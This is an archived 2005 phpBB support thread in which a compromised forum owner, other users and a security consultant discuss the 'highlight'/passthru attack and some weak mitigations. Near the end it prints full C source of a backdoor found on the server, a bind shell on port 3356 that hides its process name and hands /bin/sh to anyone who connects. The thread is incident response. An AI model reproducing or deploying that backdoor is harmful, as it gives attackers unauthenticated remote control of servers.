phpbb attacked again - zatron passthru!

This is an archive of the phpBB 2.0.x support forum. Support for phpBB2 has now ended.
Forum rules
Following phpBB2's EoL, this forum is now archived for reference purposes only.
Please see the following announcement for more information: viewtopic.php?f=14&t=1385785
User avatar
mes
Registered User
Posts: 35
Joined: Wed Apr 07, 2004 11:05 am

phpbb attacked again - zatron passthru!

Post by mes »

Getting annoyed now! Had phpbb running for a couple of years now then about 2 weeks ago got an iframe exploit throughout my site because of it.

I inturn installed phpbb 2.0.11 again thinking this version will be solid.

Then about 15mins ago my board went down and I got a message from my host saying,

It has been noticed that your site is vulnerable and has been exploited as a result by using the "passthru" option.

Your board needs to be removed and reconfigured with a new version.

How can I do this when I already had the latest version installed?

By the way i found 2 suspicions files in my phpbb/ directory (zatron.c and another zatron file) coded by Bronc Buster

Any ideas/help would be much appreciated..

Thanks Guys

mes
espicom
Registered User
Posts: 17905
Joined: Wed Dec 22, 2004 1:14 am
Location: Woodstock, IL

Post by espicom »

Wipe the website directories and reinstall, because you've got files left over from the original compromise.
User avatar
mes
Registered User
Posts: 35
Joined: Wed Apr 07, 2004 11:05 am

Post by mes »

does this include wiping all my html? can I just wipe the phpbb files.?

The thing is I have wiped the files before, but it has just come back again.

cheers guys

mes
espicom
Registered User
Posts: 17905
Joined: Wed Dec 22, 2004 1:14 am
Location: Woodstock, IL

Post by espicom »

The file you're talking about causing the problem (zatron) isn't a PHP file, so I'd say you need to AT LEAST replace all the PHP and template files with known-good ones, and review all other files in the directory to make sure you know what they are.
User avatar
mes
Registered User
Posts: 35
Joined: Wed Apr 07, 2004 11:05 am

Post by mes »

I have removed everything before, i'm thinking that maybe my web host is running an old version of php (apparently) maybe this is causing the problem. My server is clean of unknown files, they always just appear in phpbb.

oh well:-)

mes
jmbb
Registered User
Posts: 52
Joined: Wed Feb 02, 2005 5:29 pm

Post by jmbb »

That's it. That's all I needed to know. I'm changing to vbulletin now.
espicom
Registered User
Posts: 17905
Joined: Wed Dec 22, 2004 1:14 am
Location: Woodstock, IL

Post by espicom »

This is strange, but I suspect that you're running into vulnerabilities based upon file permissions.

Our PHPBB boards were under attack for over a month before we found out about the problem, and no compromise occured, because the attacks required lax file ownerships and permissions and access to programs that shouldn't be accessible to the web server user. We patched them, anyway.

Others that have all the patches in place still experience compromises. I guess paranoia is a good thing? :)
User avatar
Techie-Micheal
Security Consultant
Posts: 19511
Joined: Sun Oct 14, 2001 12:11 am
Location: In your servers

Post by Techie-Micheal »

jmbb wrote: That's it. That's all I needed to know. I'm changing to vbulletin now.
I think before you act, you need to find all of the details first ... This may well be a case of the host having an old PHP version, and have absolutely nothing to do with phpBB.

mes: I can't find anything regarding exploits in passthru at the moment. Do you have apace access logs or IIS access logs (or whichever webserver your host uses)?

Edit: This appears to be from the highlight exploit, and nothing new. Did you patch phpBB or did you do a fresh install (keeping your database intact)?
Proven Offensive Security Expertise. OSCP - GXPN
TMAN22
Registered User
Posts: 7
Joined: Wed Feb 02, 2005 8:47 pm

Post by TMAN22 »

Our board was attacked by NeverEverSanity - some sort of virus - it looked like dos with so many requests per second. The attackers were requesting viewtopic.php?highligh= (system commands which our linux box was immune to) The problem was that these requests corrupted phpbb session table and made the whole forum inaccessible with "Critical Error" Also, the cpu usage hit the roof like 98% being used by http server.

After many crashes within a few minutes I checked the http log file and found most requests had viewtopic.php?highlight=

I added the following lines to the viewtopic file and the cpu usage went back to normal right away:

if ($highlight)
{
$length = strlen($highlight);
if ($length > 15)
exit;
}

By the way we patched the "highlight" vulnerability before and these lines caused the the script to end prematurely.

After our forum went back to normal, I investigated more about the attack and I came across news articles that said the code was a virus that gets potential victims through googling "viewtopic.php"

phpbb guys said the problem is with php and php guys said nope, it is with phpbb: http://www.php.net/security-note.php
User avatar
Techie-Micheal
Security Consultant
Posts: 19511
Joined: Sun Oct 14, 2001 12:11 am
Location: In your servers

Post by Techie-Micheal »

TMAN22 wrote: Our board was attacked by NeverEverSanity - some sort of virus - it looked like dos with so many requests per second. The attackers were requesting viewtopic.php?highligh= (system commands which our linux box was immune to) The problem was that these requests corrupted phpbb session table and made the whole forum inaccessible with "Critical Error" Also, the cpu usage hit the roof like 98% being used by http server.

After many crashes within a few minutes I checked the http log file and found most requests had viewtopic.php?highlight=

I added the following lines to the viewtopic file and the cpu usage went back to normal right away:

if ($highlight)
{
$length = strlen($highlight);
if ($length > 15)
exit;
}

By the way we patched the "highlight" vulnerability before and these lines caused the the script to end prematurely.

After our forum went back to normal, I investigated more about the attack and I came across news articles that said the code was a virus that gets potential victims through googling "viewtopic.php"

phpbb guys said the problem is with php and php guys said nope, it is with phpbb: http://www.php.net/security-note.php
Yes, we know all about that notice that php.net posted ... Take note of my edit. ;) I edited it before you posted your reply, long before. However ... there are vulnerabilities in PHP that exist in versions prior to 4.3.10 that have been exploited. In fact, there is exploit code floating around that is used to exploit the vulnerability that is in PHP using phpBB ...

And your "fix" above can cause some problems. I can still execute commands on your board that are under that limit. ;) What you need to do is use code that searches for the exploit string, and not the length of the request. One particular example comes to mind.

Code: Select all

0000  00 e0 7d 8a 07 11 00 a0 c9 af bb 7f 08 00 45 00   ..}...........E.
0010  08 1c ff d7 00 00 80 01 e8 aa c0 a8 64 1e c0 a8   ............d...
0020  64 ef 00 00 bd d5 02 00 04 00 ff d8 ff fe 00 08   d...............
0030  57 41 4e 47 32 02 ff e0 00 10 4a 46 49 46 00 01   WANG2.....JFIF..
0040  01 01 00 60 00 60 00 00 ff db 00 43 00 10 0b 0c   ...`.`.....C....
0050  0e 0c 0a 10 0e 0d 0e 12 11 10 13 18 28 1a 18 16   ............(...
0060  16 18 31 23 25 1d 28 3a 33 3d 3c 39 33 38 37 40   ..1#%.(:3=<9387@
0070  48 5c 4e 40 44 57 45 37 38 50 6d 51 57 5f 62 67   H\N@DWE78PmQW_bg
[...cut...]
07f0  a7 fe 8c 6a cd f1 35 9d ee 91 af 47 e2 4d 36 06   ...j..5....G.M6.
0800  99 16 32 2f 23 0c 46 54 60 64 f3 9e 98 e8 30 36   ..2/#.FT`d....06
0810  64 d0 04 77 7e 35 3a bd ac 96 3e 1f b1 bc 92 f6   d..w~5:...>.....
0820  61 b0 33 28 5f 2d 4f 05 b2 ac                     a.3(_-O...
Now, if you had the full packet (which is much longer than that), it would be detected by Intrusion Detection Systems as a large ICMP packet. It would be detected as such as it is possible for a variety of attacks to hide in a large ICMP packet for reasons that I will not go in to here. However, do you know what the above packet is? It is a jpeg of the Microsoft logo. It turns out that when a client connects to a domain controller, data is sent back and forth, one set of which contains GPO information, and for some reason or another, Microsoft sends its logo in the communication. Perfectly valid, but is correctly considered a large ICMP packet. However, you block that, you block correct logging in to a domain, and thus denying access to the client, and perhaps screwing some things up in the process.
Last edited by Techie-Micheal on Wed Feb 02, 2005 11:21 pm, edited 1 time in total.
Proven Offensive Security Expertise. OSCP - GXPN
TMAN22
Registered User
Posts: 7
Joined: Wed Feb 02, 2005 8:47 pm

Post by TMAN22 »

Thanx mike - and I really appreciate what you guys are doing for the open source community :)
User avatar
Techie-Micheal
Security Consultant
Posts: 19511
Joined: Sun Oct 14, 2001 12:11 am
Location: In your servers

Post by Techie-Micheal »

TMAN22 wrote: Thanx mike - and I really appreciate what you guys are doing for the open source community :)
No problem. :)
Proven Offensive Security Expertise. OSCP - GXPN
User avatar
mes
Registered User
Posts: 35
Joined: Wed Apr 07, 2004 11:05 am

Post by mes »

Not sure about apace access logs or IIS access logs.

We use www.123-reg.co.uk for hosting and access via myserverworld.com administered by pipex.

Basically they are saying dont use phpbb, but I like phpbb and am used to it never had any problems like this before.

The only info I have is : It has been noticed that your site is vulnerable and has been exploited as a result by using the "passthru" option.

If that means anything to anyone i'm not sure, but were keeping the board down for the time being.

It was a fresh install of phpbb 2.0.11 on a database from a previous instalation.

Cheers,

mes
User avatar
mes
Registered User
Posts: 35
Joined: Wed Apr 07, 2004 11:05 am

Post by mes »

This is the code of one of the zatron files that we found within the phpbb root. If this is of any use to anyone:)

mes

Code: Select all

#include <stdio.h>
#include <errno.h>
#include <signal.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <strings.h>
#define P 3356
#define HIDE "http"

#define SH "/bin/sh"
#define LISTN 5

int main(int argc, char **argv)
{

/* welcome mesg */
char *fst = "\nConnected!\n\n";
char *sec = "This fine tool coded by Bronc Buster\n";
char *thr = "Please enter each command followed by ';'\n";

int outsock, insock, sz;

/* set up two structs for in and out */
struct sockaddr_in home;
struct sockaddr_in away;
/* set port, proto and bzero for BIND */
home.sin_family=AF_INET;
home.sin_port=htons(P);
home.sin_addr.s_addr=INADDR_ANY;
bzero(&(home.sin_zero),8);

/* changing the name that will appear */
strcpy(argv[0],HIDE);

/* catch the SIG */
signal(SIGCHLD,SIG_IGN);

/* here we go! */
if((outsock=socket(AF_INET,SOCK_STREAM,0))<0)
  exit(printf("Socket error\n"));

if((bind(outsock,(struct sockaddr *)&home,sizeof(home))<0))
  exit(printf("Bind error\n"));

if((listen(outsock,LISTN))<0)
  exit(printf("Listen error\n"));

sz=sizeof(struct sockaddr_in);
if(fork()) 
	 exit(0);

/* infinate loop - wait for accept*/
for(;;)
  {
  if((insock=accept(outsock,(struct sockaddr *)&away, &sz))<0)
    exit(printf("Accept error"));
  if(fork() !=0)
    {
    send(insock,fst,strlen(fst),0); /* send out welcome mesg */
    send(insock,sec,strlen(sec),0);
    send(insock,thr,strlen(thr),0);
    dup2(insock,0); /* open stdin  */
    dup2(insock,1); /* open stdout */
    dup2(insock,2); /* open stderr */
    execl(SH,SH,(char *)0); /* start our shell */
    close(insock);
    exit(0); /* all done, leave and close sock */
    }
  close(insock);
  }
}
TMAN22
Registered User
Posts: 7
Joined: Wed Feb 02, 2005 8:47 pm

Post by TMAN22 »

Hi mes,

It looks like a backdoor through 3356 port. Use a firewall or replace it with another script that will notify you about the intrusion all the commands they try to execute.

google the author of the script and u'll see he is a hacker with alt2000 email account.
Locked

Return to “2.0.x Support Forum”